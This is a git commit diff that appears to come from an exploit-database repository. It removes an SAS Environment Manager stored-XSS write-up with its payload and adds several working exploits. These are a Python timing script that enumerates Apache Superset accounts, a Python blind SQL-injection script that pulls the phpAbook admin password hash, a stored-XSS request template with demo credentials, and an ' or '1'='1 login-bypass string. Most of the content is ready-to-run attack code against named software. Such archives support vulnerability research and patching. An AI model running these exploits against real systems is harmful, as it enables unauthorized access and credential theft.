DB: 2021-07-01
6 changes to exploits/shellcodes SAS Environment Manager 2.5 - 'name' Stored Cross-Site Scripting (XSS) Doctors Patients Management System 1.0 - SQL Injection (Authentication Bypass) phpAbook 0.9i - SQL Injection Apache Superset 1.1.0 - Time-Based Account Enumeration Simple Traffic Offense System 1.0 - Stored Cross Site Scripting (XSS)
This commit is contained in:
parent
e79da91025
commit
293ca2aadb
6 changed files with 158 additions and 29 deletions
|
@ -1,28 +0,0 @@
|
||||||
# Exploit Title: SAS Environment Manager 2.5 - 'name' Stored Cross-Site Scripting (XSS)
|
|
||||||
# Date: 24/06/2021
|
|
||||||
# Exploit Author: Luqman Hakim Zahari @ Saitamang
|
|
||||||
# Vendor Homepage: https://support.sas.com/en/software/environment-manager-support.html
|
|
||||||
# Version: 2.5
|
|
||||||
# Tested on: CentOS 7
|
|
||||||
# CVE : CVE-2021-35475
|
|
||||||
|
|
||||||
# Description #
|
|
||||||
|
|
||||||
SAS® Environment Manager 2.5 allows XSS through the Name field when creating/editing a server. The XSS will prompt when editing the Configuration Properties.
|
|
||||||
|
|
||||||
# Proof of Concept(PoC) # https://github.com/saitamang/CVE-2021-35475/blob/main/README.md
|
|
||||||
|
|
||||||
*Steps to Reproduce:*
|
|
||||||
|
|
||||||
[1.] Login to your system > On "Resource" tab > "Browse""
|
|
||||||
[2.] Choose a "Platform"
|
|
||||||
[3.] Click "Inventory" tab > Under "Servers" tab click "New..."
|
|
||||||
[4.] Under "General Properties" tab on "Name" field , enter the payload(below) > Filled up other information and click "Ok" button
|
|
||||||
|
|
||||||
payload :
|
|
||||||
|
|
||||||
name=XSS"><marquee onstart=confirm('XSS')>@SAITAMANG
|
|
||||||
|
|
||||||
[5.] Successfully saved the payload page will shown
|
|
||||||
[6.] Then scroll down to bottom under "Configuration Properties" tab > click "Edit" button
|
|
||||||
[7.] Then the payload will be executed
|
|
64
exploits/multiple/webapps/50072.py
Executable file
64
exploits/multiple/webapps/50072.py
Executable file
|
@ -0,0 +1,64 @@
|
||||||
|
# Exploit Title: Apache Superset 1.1.0 - Time-Based Account Enumeration
|
||||||
|
# Author: Dolev Farhi
|
||||||
|
# Date: 2021-05-13
|
||||||
|
# Vendor Homepage: https://superset.apache.org/
|
||||||
|
# Version: 1.1.0
|
||||||
|
# Tested on: Ubuntu
|
||||||
|
|
||||||
|
import sys
|
||||||
|
import requests
|
||||||
|
import time
|
||||||
|
|
||||||
|
scheme = 'http'
|
||||||
|
host = '192.168.1.1'
|
||||||
|
port = 8080
|
||||||
|
|
||||||
|
# change with your wordlist
|
||||||
|
usernames = ['guest', 'admin', 'administrator', 'idontexist', 'superset']
|
||||||
|
|
||||||
|
url = '{}://{}:{}'.format(scheme, host, port)
|
||||||
|
login_endpoint = '/login/'
|
||||||
|
|
||||||
|
session = requests.Session()
|
||||||
|
|
||||||
|
def get_csrf():
|
||||||
|
token = None
|
||||||
|
r = session.get(url + login_endpoint, verify=False)
|
||||||
|
|
||||||
|
for line in r.text.splitlines():
|
||||||
|
if 'csrf_token' in line:
|
||||||
|
try:
|
||||||
|
token = line.strip().split('"')[-2]
|
||||||
|
except:
|
||||||
|
pass
|
||||||
|
return token
|
||||||
|
|
||||||
|
csrf_token = get_csrf()
|
||||||
|
|
||||||
|
if not csrf_token:
|
||||||
|
print('Could not obtain CSRF token, the exploit will likely fail.')
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
data = {
|
||||||
|
'csrf_token':csrf_token,
|
||||||
|
'username':'',
|
||||||
|
'password':'abc'
|
||||||
|
}
|
||||||
|
|
||||||
|
attempts = {}
|
||||||
|
found = False
|
||||||
|
|
||||||
|
for user in usernames:
|
||||||
|
start = time.time()
|
||||||
|
data['username'] = user
|
||||||
|
r = session.post(url + login_endpoint, data=data, verify=False, allow_redirects=True)
|
||||||
|
roundtrip = time.time() - start
|
||||||
|
attempts["%.4f" % roundtrip] = user
|
||||||
|
|
||||||
|
print('[!] Accounts existence probability is sorted from high to low')
|
||||||
|
|
||||||
|
count = 0
|
||||||
|
|
||||||
|
for key in sorted(attempts, reverse=True):
|
||||||
|
count += 1
|
||||||
|
print("%s. %s (timing: %s)" % (count, attempts[key], key))
|
38
exploits/multiple/webapps/50073.txt
Normal file
38
exploits/multiple/webapps/50073.txt
Normal file
|
@ -0,0 +1,38 @@
|
||||||
|
# Exploit Title: Simple Traffic Offense System 1.0 - 'Multiple' Stored Cross Site Scripting (XSS)
|
||||||
|
# Date: 30-06-2021
|
||||||
|
# Exploit Author: Barış Yıldızoğlu
|
||||||
|
# Vendor Homepage: https://www.sourcecodester.com/
|
||||||
|
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/trafic.zip
|
||||||
|
# Version: 1.0
|
||||||
|
# Tested on: Windows 10 Home 64 Bit + Wampserver Version 3.2.3
|
||||||
|
|
||||||
|
# Description: Almost all inputs contain Stored XSS on the website
|
||||||
|
|
||||||
|
Request:
|
||||||
|
|
||||||
|
POST /Trafic/save-reported.php HTTP/1.1
|
||||||
|
Host: 127.0.0.1
|
||||||
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101
|
||||||
|
Firefox/78.0
|
||||||
|
Accept:
|
||||||
|
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Content-Length: 168
|
||||||
|
Origin: http://127.0.0.1
|
||||||
|
Connection: close
|
||||||
|
Referer: http://127.0.0.1/Trafic/report-offence.php
|
||||||
|
Cookie: PHPSESSID=vbsq5n2m09etst1mfcmq84gifo
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
|
||||||
|
offence_id={Payload here}&vehicle_no={Payload here}&driver_license={Payload
|
||||||
|
here}&name={Payload here}&address={Payload here}&gender={Payload
|
||||||
|
here}&officer_reporting={Payload here}&offence={Payload here}
|
||||||
|
|
||||||
|
|
||||||
|
# Steps to Reproduce:
|
||||||
|
[1.] Login to the system [+] username=Torrahclef&pass=yemiyemi
|
||||||
|
[2.] Go to the Report Offense page
|
||||||
|
[3.] Send the request above with the Stored XSS payload
|
||||||
|
[4.] Dashboard and Offense list pages will be triggered
|
38
exploits/php/webapps/50071.py
Executable file
38
exploits/php/webapps/50071.py
Executable file
|
@ -0,0 +1,38 @@
|
||||||
|
# Exploit Title: phpAbook 0.9i - SQL Injection
|
||||||
|
# Date: 2021-06-29
|
||||||
|
# Vendor Homepage: http://sourceforge.net/projects/phpabook/
|
||||||
|
# Exploit Author: Said Cortes, Alejandro Perez
|
||||||
|
# Version: v0.9i
|
||||||
|
# This was written for educational purpose. Use it at your own risk.
|
||||||
|
# Author will be not responsible for any damage.
|
||||||
|
|
||||||
|
import requests
|
||||||
|
import argparse
|
||||||
|
import string
|
||||||
|
import sys
|
||||||
|
|
||||||
|
|
||||||
|
def exploit(session,host):
|
||||||
|
print("Starting Exploit\nSearching Admin Hash...")
|
||||||
|
passwordhash = ''
|
||||||
|
for i in range(1,33):
|
||||||
|
charset = string.digits + string.ascii_lowercase
|
||||||
|
for letter in charset:
|
||||||
|
burp0_url = f"{host}/index.php"
|
||||||
|
burp0_data = {"auth_user": f"admin'-IF((SELECT MID(password,{i},1) from ab_auth_user where uid=1)='{letter}',SLEEP(3),0)#", "auth_passwd": "admin", "lang": "en", "submit": "Login"}
|
||||||
|
try:
|
||||||
|
session.post(burp0_url, data=burp0_data, timeout=1)
|
||||||
|
except requests.Timeout:
|
||||||
|
passwordhash += letter
|
||||||
|
continue
|
||||||
|
print("admin:"+passwordhash)
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
if __name__ == "__main__" :
|
||||||
|
session = requests.session()
|
||||||
|
parser = argparse.ArgumentParser()
|
||||||
|
parser.add_argument("-u","--url",help="host url \nex: http://127.0.0.1/phpabook",required=True)
|
||||||
|
arg = parser.parse_args()
|
||||||
|
exploit(session,arg.url)
|
14
exploits/php/webapps/50074.txt
Normal file
14
exploits/php/webapps/50074.txt
Normal file
|
@ -0,0 +1,14 @@
|
||||||
|
# Exploit Title: Doctors Patients Management System 1.0 - SQL Injection (Authentication Bypass)
|
||||||
|
# Date: 06/30/2021
|
||||||
|
# Exploit Author: Murat DEMIRCI (butterflyhunt3r)
|
||||||
|
# Vendor Homepage: https://www.codester.com/
|
||||||
|
# Software Link: https://www.codester.com/items/31349/medisol-doctors-patients-managment-system
|
||||||
|
# Version: 1.0
|
||||||
|
# Tested on: Windows 10
|
||||||
|
# Description : The admin login of this app is vulnerable to sql injection login bypass. Anyone can bypass admin login authentication.
|
||||||
|
|
||||||
|
# Proof of Concept :
|
||||||
|
http://test.com/PATH/signin
|
||||||
|
|
||||||
|
# Username : anything
|
||||||
|
# Password : ' or '1'='1
|
|
@ -44207,6 +44207,9 @@ id,file,description,date,author,type,platform,port
|
||||||
50063,exploits/php/webapps/50063.txt,"Simple Client Management System 1.0 - 'uemail' SQL Injection (Unauthenticated)",2021-06-25,"Barış Yıldızoğlu",webapps,php,
|
50063,exploits/php/webapps/50063.txt,"Simple Client Management System 1.0 - 'uemail' SQL Injection (Unauthenticated)",2021-06-25,"Barış Yıldızoğlu",webapps,php,
|
||||||
50064,exploits/php/webapps/50064.rb,"Lightweight facebook-styled blog 1.3 - Remote Code Execution (RCE) (Authenticated) (Metasploit)",2021-06-25,"Maide Ilkay Aydogdu",webapps,php,
|
50064,exploits/php/webapps/50064.rb,"Lightweight facebook-styled blog 1.3 - Remote Code Execution (RCE) (Authenticated) (Metasploit)",2021-06-25,"Maide Ilkay Aydogdu",webapps,php,
|
||||||
50066,exploits/php/webapps/50066.txt,"WordPress Plugin YOP Polls 6.2.7 - Stored Cross Site Scripting (XSS)",2021-06-28,"Toby Jackson",webapps,php,
|
50066,exploits/php/webapps/50066.txt,"WordPress Plugin YOP Polls 6.2.7 - Stored Cross Site Scripting (XSS)",2021-06-28,"Toby Jackson",webapps,php,
|
||||||
50067,exploits/multiple/webapps/50067.txt,"SAS Environment Manager 2.5 - 'name' Stored Cross-Site Scripting (XSS)",2021-06-28,"Luqman Hakim Zahari",webapps,multiple,
|
50074,exploits/php/webapps/50074.txt,"Doctors Patients Management System 1.0 - SQL Injection (Authentication Bypass)",2021-06-30,"Murat DEMİRCİ",webapps,php,
|
||||||
50068,exploits/macos/webapps/50068.txt,"Atlassian Jira Server/Data Center 8.16.0 - Reflected Cross-Site Scripting (XSS)",2021-06-28,Captain_hook,webapps,macos,
|
50068,exploits/macos/webapps/50068.txt,"Atlassian Jira Server/Data Center 8.16.0 - Reflected Cross-Site Scripting (XSS)",2021-06-28,Captain_hook,webapps,macos,
|
||||||
50069,exploits/hardware/webapps/50069.py,"Netgear WNAP320 2.0.3 - 'macAddress' Remote Code Execution (RCE) (Unauthenticated)",2021-06-28,"Bryan Leong",webapps,hardware,
|
50069,exploits/hardware/webapps/50069.py,"Netgear WNAP320 2.0.3 - 'macAddress' Remote Code Execution (RCE) (Unauthenticated)",2021-06-28,"Bryan Leong",webapps,hardware,
|
||||||
|
50071,exploits/php/webapps/50071.py,"phpAbook 0.9i - SQL Injection",2021-06-30,"Alejandro Perez",webapps,php,
|
||||||
|
50072,exploits/multiple/webapps/50072.py,"Apache Superset 1.1.0 - Time-Based Account Enumeration",2021-06-30,"Dolev Farhi",webapps,multiple,
|
||||||
|
50073,exploits/multiple/webapps/50073.txt,"Simple Traffic Offense System 1.0 - Stored Cross Site Scripting (XSS)",2021-06-30,"Barış Yıldızoğlu",webapps,multiple,
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue